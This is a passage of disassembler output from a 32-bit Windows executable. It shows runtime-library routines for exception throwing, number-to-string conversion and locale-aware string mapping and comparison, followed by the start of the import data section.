push eax
call sub_426587
int 3 ; Trap to Debugger
sub_426173 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4261B0 proc near ; CODE XREF: sub_4260FE+32�p
; sub_4261D0+32�p ...
arg_0 = dword ptr 4
push esi
xor eax, eax
push 0FFFFFFFFh
mov esi, ecx
push eax
push [esp+0Ch+arg_0]
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_40D824
mov eax, esi
pop esi
retn 4
sub_4261B0 endp
; =============== S U B R O U T I N E =======================================
sub_4261D0 proc near ; CODE XREF: sub_42629A+29�p
mov eax, offset loc_426B06
call sub_41D640
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_427CAC
call sub_4264DD
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427C90
call sub_4261B0
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4261D0 endp
; =============== S U B R O U T I N E =======================================
sub_426218 proc near ; CODE XREF: sub_426282+7�p
; sub_4262DE+7�p ...
mov eax, offset loc_426B18
call sub_41D640
push ecx
push esi
push edi
mov edi, [ebp+8]
mov esi, ecx
push edi
mov [ebp-10h], esi
call sub_42651A
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427C90
call sub_4261B0
mov ecx, [ebp-0Ch]
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_426218 endp
; =============== S U B R O U T I N E =======================================
sub_42625B proc near ; DATA XREF: .rdata:off_427CCC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_426277
test [esp+4+arg_0], 1
jz short loc_426271
push esi
call sub_41D65F
pop ecx
loc_426271: ; CODE XREF: sub_42625B+D�j
mov eax, esi
pop esi
retn 4
sub_42625B endp
; =============== S U B R O U T I N E =======================================
sub_426277 proc near ; CODE XREF: sub_42625B+3�p
; DATA XREF: .rdata:004280BC�o
mov dword ptr [ecx], offset off_427CCC
jmp sub_4260BA
sub_426277 endp
; =============== S U B R O U T I N E =======================================
sub_426282 proc near ; CODE XREF: sub_4262F6+46�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_426218
mov dword ptr [esi], offset off_427CA0
mov eax, esi
pop esi
retn 4
sub_426282 endp
; =============== S U B R O U T I N E =======================================
sub_42629A proc near ; CODE XREF: sub_40D774+15�p
; sub_40D7CD+15�p ...
mov eax, offset loc_426B2A
call sub_41D640
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-20h]
call sub_426090
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4261D0
push offset dword_4280B8
lea eax, [ebp-3Ch]
push eax
mov dword ptr [ebp-3Ch], offset off_427CCC
call sub_426587
int 3 ; Trap to Debugger
sub_42629A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4262DE proc near ; CODE XREF: sub_4262F6+28�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_426218
mov dword ptr [esi], offset off_427CCC
mov eax, esi
pop esi
retn 4
sub_4262DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4262F6 proc near ; DATA XREF: .rdata:00427C98�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_426218
push offset dword_4280F8
lea eax, [ebp+var_1C]
push eax
call sub_426587
int 3 ; Trap to Debugger
loc_426314: ; DATA XREF: .rdata:00427CD4�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4262DE
push offset dword_4280B8
lea eax, [ebp+var_1C]
push eax
call sub_426587
int 3 ; Trap to Debugger
loc_426332: ; DATA XREF: .rdata:00427CA8�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_426282
push offset dword_428010
lea eax, [ebp+var_1C]
push eax
call sub_426587
int 3 ; Trap to Debugger
sub_4262F6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_426350 proc near ; CODE XREF: sub_40D104+5E�p
; sub_40F3AA+14A�p ...
jmp ds:dword_427210
sub_426350 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_426356 proc near ; CODE XREF: sub_41D2AC+23�p
; sub_41D550+13�p
jmp ds:dword_4271A4
sub_426356 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42635C proc near ; CODE XREF: .text:0040B091�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0Ah
jnz short loc_426371
cmp [ebp+arg_0], 0
jge short loc_426371
push 1
push 0Ah
jmp short loc_426376
; ---------------------------------------------------------------------------
loc_426371: ; CODE XREF: sub_42635C+7�j
; sub_42635C+D�j
push 0
push [ebp+arg_8]
loc_426376: ; CODE XREF: sub_42635C+13�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_426389
mov eax, [ebp+arg_4]
add esp, 10h
pop ebp
retn
sub_42635C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426389 proc near ; CODE XREF: sub_42635C+20�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
mov ecx, [ebp+arg_4]
push ebx
push esi
push edi
jz short loc_4263A3
mov esi, [ebp+arg_0]
mov byte ptr [ecx], 2Dh
inc ecx
neg esi
jmp short loc_4263A6
; ---------------------------------------------------------------------------
loc_4263A3: ; CODE XREF: sub_426389+D�j
mov esi, [ebp+arg_0]
loc_4263A6: ; CODE XREF: sub_426389+18�j
mov edi, ecx
loc_4263A8: ; CODE XREF: sub_426389+43�j
mov eax, esi
xor edx, edx
div [ebp+arg_8]
mov eax, esi
mov ebx, edx
xor edx, edx
div [ebp+arg_8]
cmp ebx, 9
mov esi, eax
jbe short loc_4263C4
add bl, 57h
jmp short loc_4263C7
; ---------------------------------------------------------------------------
loc_4263C4: ; CODE XREF: sub_426389+34�j
add bl, 30h
loc_4263C7: ; CODE XREF: sub_426389+39�j
mov [ecx], bl
inc ecx
test esi, esi
ja short loc_4263A8
and byte ptr [ecx], 0
dec ecx
loc_4263D2: ; CODE XREF: sub_426389+55�j
mov dl, [edi]
mov al, [ecx]
mov [ecx], dl
mov [edi], al
dec ecx
inc edi
cmp edi, ecx
jb short loc_4263D2
pop edi
pop esi
pop ebx
pop ebp
retn
sub_426389 endp
; =============== S U B R O U T I N E =======================================
sub_4263E5 proc near ; CODE XREF: sub_41761C+E2�p
; sub_41761C+F9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp dword_4DBE84, 0
push ebx
jnz short loc_42642B
mov edx, [esp+4+arg_4]
mov ecx, [esp+4+arg_0]
loc_4263F7: ; CODE XREF: sub_4263E5+42�j
mov bx, [ecx]
cmp bx, 5Ah
ja short loc_426409
cmp bx, 41h
jb short loc_426409
add ebx, 20h
loc_426409: ; CODE XREF: sub_4263E5+19�j
; sub_4263E5+1F�j
mov ax, [edx]
cmp ax, 5Ah
ja short loc_42641B
cmp ax, 41h
jb short loc_42641B
add eax, 20h
loc_42641B: ; CODE XREF: sub_4263E5+2B�j
; sub_4263E5+31�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_42645B
cmp bx, ax
jz short loc_4263F7
jmp short loc_42645B
; ---------------------------------------------------------------------------
loc_42642B: ; CODE XREF: sub_4263E5+8�j
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_4]
loc_426435: ; CODE XREF: sub_4263E5+72�j
mov ax, [esi]
inc esi
push eax
inc esi
call sub_4265C1
mov ebx, eax
mov ax, [edi]
inc edi
push eax
inc edi
call sub_4265C1
pop ecx
test bx, bx
pop ecx
jz short loc_426459
cmp bx, ax
jz short loc_426435
loc_426459: ; CODE XREF: sub_4263E5+6D�j
pop edi
pop esi
loc_42645B: ; CODE XREF: sub_4263E5+3D�j
; sub_4263E5+44�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
retn
sub_4263E5 endp
; =============== S U B R O U T I N E =======================================
sub_426465 proc near ; CODE XREF: sub_41843B+21�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_42648C
push esi
call sub_41B9C0
inc eax
push eax
call sub_41BEB5
pop ecx
test eax, eax
pop ecx
jz short loc_42648C
push esi
push eax
call sub_41C890
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_42648C: ; CODE XREF: sub_426465+7�j
; sub_426465+1A�j
xor eax, eax
pop esi
retn
sub_426465 endp
; =============== S U B R O U T I N E =======================================
sub_426490 proc near ; CODE XREF: sub_4264A5+3�p
mov dword ptr [ecx], offset off_427CEC
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_4264A4
push ecx
call sub_41BA91
pop ecx
locret_4264A4: ; CODE XREF: sub_426490+B�j
retn
sub_426490 endp
; =============== S U B R O U T I N E =======================================
sub_4264A5 proc near ; DATA XREF: .rdata:off_427CEC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_426490
test [esp+4+arg_0], 1
jz short loc_4264BB
push esi
call sub_41D65F
pop ecx
loc_4264BB: ; CODE XREF: sub_4264A5+D�j
mov eax, esi
pop esi
retn 4
sub_4264A5 endp
; =============== S U B R O U T I N E =======================================
sub_4264C1 proc near ; DATA XREF: .rdata:off_427CF4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_426564
test [esp+4+arg_0], 1
jz short loc_4264D7
push esi
call sub_41D65F
pop ecx
loc_4264D7: ; CODE XREF: sub_4264C1+D�j
mov eax, esi
pop esi
retn 4
sub_4264C1 endp
; =============== S U B R O U T I N E =======================================
sub_4264DD proc near ; CODE XREF: sub_4260FE+1D�p
; sub_4261D0+1D�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_427CF4
push dword ptr [edi]
call sub_41B9C0
inc eax
push eax
call sub_41D9A5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_42650C
push dword ptr [edi]
push eax
call sub_41C890
pop ecx
pop ecx
loc_42650C: ; CODE XREF: sub_4264DD+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_4264DD endp
; =============== S U B R O U T I N E =======================================
sub_42651A proc near ; CODE XREF: sub_426218+16�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_427CF4
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_426557
push dword ptr [edi+4]
call sub_41B9C0
inc eax
push eax
call sub_41D9A5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_42655D
push dword ptr [edi+4]
push eax
call sub_41C890
pop ecx
pop ecx
jmp short loc_42655D
; ---------------------------------------------------------------------------
loc_426557: ; CODE XREF: sub_42651A+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_42655D: ; CODE XREF: sub_42651A+2E�j
; sub_42651A+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_42651A endp
; =============== S U B R O U T I N E =======================================
sub_426564 proc near ; CODE XREF: sub_4260BA+16�j
; sub_4264C1+3�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_427CF4
jz short locret_426579
push dword ptr [ecx+4]
call sub_41D65F
pop ecx
locret_426579: ; CODE XREF: sub_426564+A�j
retn
sub_426564 endp
; =============== S U B R O U T I N E =======================================
sub_42657A proc near ; DATA XREF: .rdata:00427CF8�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_426586
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_426586: ; CODE XREF: sub_42657A+5�j
retn
sub_42657A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426587 proc near ; CODE XREF: sub_426173+37�p
; sub_42629A+3E�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_427D10
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_427050 ; RaiseException
pop edi
pop esi
leave
retn 8
sub_426587 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4265C1 proc near ; CODE XREF: sub_4263E5+56�p
; sub_4263E5+63�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp ax, 0FFFFh
jnz short loc_4265D3
or ax, ax
leave
retn
; ---------------------------------------------------------------------------
loc_4265D3: ; CODE XREF: sub_4265C1+B�j
cmp dword_4DBE84, 0
jnz short loc_4265ED
cmp ax, 41h
jb short locret_426634
cmp ax, 5Ah
ja short locret_426634
add eax, 20h
leave
retn
; ---------------------------------------------------------------------------
loc_4265ED: ; CODE XREF: sub_4265C1+19�j
cmp ax, 100h
jnb short loc_426607
push 1
push eax
call sub_42686F
pop ecx
test eax, eax
pop ecx
jnz short loc_426607
mov ax, word ptr [ebp+arg_0]
leave
retn
; ---------------------------------------------------------------------------
loc_426607: ; CODE XREF: sub_4265C1+30�j
; sub_4265C1+3E�j
push 0
lea eax, [ebp+var_2]
push 1
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 100h
push dword_4DBE84
call sub_426636
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_0]
jz short locret_426634
mov ax, [ebp+var_2]
locret_426634: ; CODE XREF: sub_4265C1+1F�j
; sub_4265C1+25�j ...
leave
retn
sub_4265C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426636 proc near ; CODE XREF: sub_4265C1+5F�p
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427D30
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
cmp dword_4DC010, esi
jnz short loc_4266AC
push esi
push esi
push 1
pop ebx
push ebx
push offset dword_427920
mov edi, 100h
push edi
push esi
call ds:dword_427044 ; LCMapStringW
test eax, eax
jz short loc_42668A
mov dword_4DC010, ebx
jmp short loc_4266AC
; ---------------------------------------------------------------------------
loc_42668A: ; CODE XREF: sub_426636+4A�j
push esi
push esi
push ebx
push offset word_4CB88C
push edi
push esi
call ds:dword_427048 ; LCMapStringA
test eax, eax
jz loc_42682B
mov dword_4DC010, 2
loc_4266AC: ; CODE XREF: sub_426636+2E�j
; sub_426636+52�j
cmp [ebp+arg_C], esi
jle short loc_4266C1
push [ebp+arg_C]
push [ebp+arg_8]
call sub_42683F
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_4266C1: ; CODE XREF: sub_426636+79�j
mov eax, dword_4DC010
cmp eax, 1
jnz short loc_4266E8
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_427044 ; LCMapStringW
jmp loc_42682D
; ---------------------------------------------------------------------------
loc_4266E8: ; CODE XREF: sub_426636+93�j
cmp eax, 2
jnz loc_42682B
cmp [ebp+arg_18], esi
jnz short loc_4266FE
mov eax, dword_4DBE94
mov [ebp+arg_18], eax
loc_4266FE: ; CODE XREF: sub_426636+BE�j
push esi
push esi
push esi
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call ds:dword_427188 ; WideCharToMultiByte
mov [ebp+var_20], eax
cmp eax, esi
jz loc_42682B
mov [ebp+var_4], esi
add eax, 3
and al, 0FCh
call sub_41C500
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_1C], eax
jmp short loc_426744
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
mov [ebp+var_1C], esi
loc_426744: ; CODE XREF: sub_426636+100�j
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+var_1C], esi
jz loc_42682B
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call ds:dword_427188 ; WideCharToMultiByte
test eax, eax
jz loc_42682B
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_427048 ; LCMapStringA
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, esi
jz loc_42682B
mov [ebp+var_4], 1
add eax, 3
and al, 0FCh
call sub_41C500
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4267C7
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+var_2C]
loc_4267C7: ; CODE XREF: sub_426636+17D�j
cmp ebx, esi
jz short loc_42682B
push edi
push ebx
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_427048 ; LCMapStringA
test eax, eax
jz short loc_42682B
test byte ptr [ebp+arg_4+1], 4
jz short loc_426805
mov eax, [ebp+arg_14]
cmp eax, esi
jz short loc_426827
cmp eax, edi
jl short loc_4267F6
mov eax, edi
loc_4267F6: ; CODE XREF: sub_426636+1BC�j
push eax
push ebx
push [ebp+arg_10]
call sub_41BFD0
add esp, 0Ch
jmp short loc_426827
; ---------------------------------------------------------------------------
loc_426805: ; CODE XREF: sub_426636+1B1�j
cmp [ebp+arg_14], esi
jnz short loc_42680E
push esi
push esi
jmp short loc_426814
; ---------------------------------------------------------------------------
loc_42680E: ; CODE XREF: sub_426636+1D2�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_426814: ; CODE XREF: sub_426636+1D6�j
push edi
push ebx
push 1
push [ebp+arg_18]
call ds:dword_4270E8 ; MultiByteToWideChar
mov edi, eax
cmp edi, esi
jz short loc_42682B
loc_426827: ; CODE XREF: sub_426636+1B8�j
; sub_426636+1CD�j
mov eax, edi
jmp short loc_42682D
; ---------------------------------------------------------------------------
loc_42682B: ; CODE XREF: sub_426636+66�j
; sub_426636+B5�j ...
xor eax, eax
loc_42682D: ; CODE XREF: sub_426636+AD�j
; sub_426636+1F3�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_426636 endp
; =============== S U B R O U T I N E =======================================
sub_42683F proc near ; CODE XREF: sub_426636+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_42685E
loc_42684F: ; CODE XREF: sub_42683F+1D�j
cmp word ptr [eax], 0
jz short loc_42685E
inc eax
mov esi, ecx
inc eax
dec ecx
test esi, esi
jnz short loc_42684F
loc_42685E: ; CODE XREF: sub_42683F+E�j
; sub_42683F+14�j
cmp word ptr [eax], 0
pop esi
jnz short loc_42686C
sub eax, [esp+arg_0]
sar eax, 1
retn
; ---------------------------------------------------------------------------
loc_42686C: ; CODE XREF: sub_42683F+24�j
mov eax, edx
retn
sub_42683F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42686F proc near ; CODE XREF: sub_4265C1+35�p
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFh
jz short loc_4268AF
cmp [ebp+arg_0], 100h
jnb short loc_426893
movzx eax, [ebp+arg_0]
mov ecx, off_43CE7C
mov ax, [ecx+eax*2]
jmp short loc_4268B6
; ---------------------------------------------------------------------------
loc_426893: ; CODE XREF: sub_42686F+12�j
push 0
lea eax, [ebp+var_4]
push 0
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 1
call sub_4268C1
add esp, 18h
test eax, eax
jnz short loc_4268B3
loc_4268AF: ; CODE XREF: sub_42686F+A�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4268B3: ; CODE XREF: sub_42686F+3E�j
mov eax, [ebp+var_4]
loc_4268B6: ; CODE XREF: sub_42686F+22�j
movzx ecx, [ebp+arg_4]
movzx eax, ax
and eax, ecx
leave
retn
sub_42686F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4268C1 proc near ; CODE XREF: sub_42686F+34�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427D48
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_4DC014
xor edi, edi
cmp eax, edi
jnz short loc_426930
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_427920
push esi
call ds:dword_427014 ; GetStringTypeW
test eax, eax
jz short loc_42690E
mov eax, esi
jmp short loc_42692B
; ---------------------------------------------------------------------------
loc_42690E: ; CODE XREF: sub_4268C1+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset word_4CB88C
push esi
push edi
call ds:dword_427018 ; GetStringTypeA
test eax, eax
jz loc_426A72
push 2
pop eax
loc_42692B: ; CODE XREF: sub_4268C1+4B�j
mov dword_4DC014, eax
loc_426930: ; CODE XREF: sub_4268C1+2F�j
cmp eax, 1
jnz short loc_42694C
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_427014 ; GetStringTypeW
jmp loc_426A74
; ---------------------------------------------------------------------------
loc_42694C: ; CODE XREF: sub_4268C1+72�j
cmp eax, 2
jnz loc_426A72
cmp [ebp+arg_10], edi
jnz short loc_426962
mov eax, dword_4DBE94
mov [ebp+arg_10], eax
loc_426962: ; CODE XREF: sub_4268C1+97�j
push edi
push edi
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call ds:dword_427188 ; WideCharToMultiByte
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz loc_426A72
mov [ebp+var_4], edi
add eax, 3
and al, 0FCh
call sub_41C500
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_2C], eax
push esi
push edi
push eax
call sub_41BF70
add esp, 0Ch
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4269C0
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_2C], edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4269C0: ; CODE XREF: sub_4268C1+EA�j
cmp [ebp+var_2C], edi
jz loc_426A72
push edi
push edi
push esi
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call ds:dword_427188 ; WideCharToMultiByte
test eax, eax
jz loc_426A72
mov [ebp+var_4], 1
lea eax, [esi+esi+2]
add eax, 3
and al, 0FCh
call sub_41C500
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
jmp short loc_426A15
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
loc_426A15: ; CODE XREF: sub_4268C1+147�j
or [ebp+var_4], 0FFFFFFFFh
cmp ebx, edi
jz short loc_426A72
mov eax, [ebp+arg_14]
cmp eax, edi
jnz short loc_426A29
mov eax, dword_4DBE84
loc_426A29: ; CODE XREF: sub_4268C1+161�j
mov ecx, [ebp+arg_8]
lea edi, [ecx+ecx]
lea esi, [edi+ebx]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_0]
push eax
call ds:dword_427018 ; GetStringTypeA
mov [ebp+var_20], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_426A72
cmp word ptr [esi], 0FFFFh
jnz short loc_426A72
push edi
push ebx
push [ebp+arg_C]
call sub_41D670
add esp, 0Ch
mov eax, [ebp+var_20]
jmp short loc_426A74
; ---------------------------------------------------------------------------
loc_426A72: ; CODE XREF: sub_4268C1+61�j
; sub_4268C1+8E�j ...
xor eax, eax
loc_426A74: ; CODE XREF: sub_4268C1+86�j
; sub_4268C1+1AF�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4268C1 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_426A88 proc near ; DATA XREF: .rdata:00427EFC�o
; FUNCTION CHUNK AT 0040D76C SIZE 00000008 BYTES
lea ecx, [ebp-38h]
jmp loc_40D76C
sub_426A88 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_426AA6
mov ecx, [ebp+8]
jmp loc_40D76C
; ---------------------------------------------------------------------------
locret_426AA6: ; CODE XREF: .text:00426A98�j
retn
; ---------------------------------------------------------------------------
loc_426AA7: ; DATA XREF: sub_40D340�o
mov eax, offset dword_427ED0
jmp loc_41D2FB
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+14h]
jmp loc_40D76C
; =============== S U B R O U T I N E =======================================
sub_426ABC proc near ; DATA XREF: .rdata:00427F2C�o
lea ecx, [ebp-1Ch]
jmp loc_40D76C
sub_426ABC endp
; ---------------------------------------------------------------------------
loc_426AC4: ; DATA XREF: sub_40D4E2�o
mov eax, offset dword_427F00
jmp loc_41D2FB
; ---------------------------------------------------------------------------
align 10h
loc_426AD0: ; DATA XREF: sub_40DA4F�o
mov eax, offset dword_427F30
jmp loc_41D2FB
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_426564
; ---------------------------------------------------------------------------
loc_426AE2: ; DATA XREF: sub_4260FE�o
mov eax, offset dword_427F90
jmp loc_41D2FB
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40D76C
; ---------------------------------------------------------------------------
loc_426AF4: ; DATA XREF: sub_426173�o
mov eax, offset dword_428028
jmp loc_41D2FB
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_426564
; ---------------------------------------------------------------------------
loc_426B06: ; DATA XREF: sub_4261D0�o
mov eax, offset dword_42804C
jmp loc_41D2FB
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_426564
; ---------------------------------------------------------------------------
loc_426B18: ; DATA XREF: sub_426218�o
mov eax, offset dword_428070
jmp loc_41D2FB
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40D76C
; ---------------------------------------------------------------------------
loc_426B2A: ; DATA XREF: sub_42629A�o
mov eax, offset dword_4280D0
jmp loc_41D2FB
_text ends
; Section 2. (virtual address 00027000)
; Virtual size : 00001B90 ( 7056.)
; Section size in file : 00001B90 ( 7056.)
; Offset to raw data for section: 00027000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 427000h
dword_427000 dd 77E78EAAh ; DATA XREF: sub_41036B+5EC�r
; sub_41716F+C0�r ...
dword_427004 dd 77E70192h ; DATA XREF: sub_4251BB+F9�r
dword_427008 dd 77E7176Ch ; DATA XREF: sub_424FB8+8�r
dword_42700C dd 77E7339Ch ; DATA XREF: sub_424F80+C�r
dword_427010 dd 77E7C9E7h ; DATA XREF: sub_424F62+5�r
; sub_424F73+6�r
dword_427014 dd 77E7C866h ; DATA XREF: sub_4244F4+3F�r
; sub_4244F4+12D�r ...
dword_427018 dd 77E641EBh ; DATA XREF: sub_4244F4+59�r
; sub_4244F4+8D�r ...
dword_42701C dd 77E73FF9h ; DATA XREF: sub_4240E7+2C�r
